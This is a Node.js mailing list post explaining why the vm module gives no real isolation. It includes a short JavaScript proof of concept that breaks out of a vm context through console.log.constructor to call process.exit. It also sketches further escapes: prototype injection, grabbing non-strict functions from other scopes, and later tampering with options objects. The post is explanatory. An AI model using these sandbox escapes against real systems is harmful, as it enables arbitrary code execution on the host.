Austin: won't go into great detail, but heres a fun little example:
```javascript
function exploit() {
console.log.constructor("process.exit(42)")();
}
var result = require('vm').runInNewContext([
'"use strict";',
'('+exploit.toString()+')()'
].join('\n'), {console:console});
console.log('I SURVIVED THE STORM!'); // it wont
```
Thats pretty trivial and then prototype injection attacks can occur if you
pass in natives and eventually use say... JSON.stringify if you override
.toJSON, .toString, .constructor, .valueOf, .__proto__, ...
Then it gets worse when you do something like say... get a hold of a
non-strict mode function from a different scope by having it construct lets
say a continuation callback ...
Even still... get a hold of some options object that feeds into a secure
area and set the options to something insecure (at a future point in time
with lets say Object.defineProperty).
...
it goes on...
...
--
Job Board: http://jobs.nodejs.org/
Posting guidelines:
https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines
You received this message because you are subscribed to the Google
Groups "nodejs" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/nodejs?hl=en?hl=en
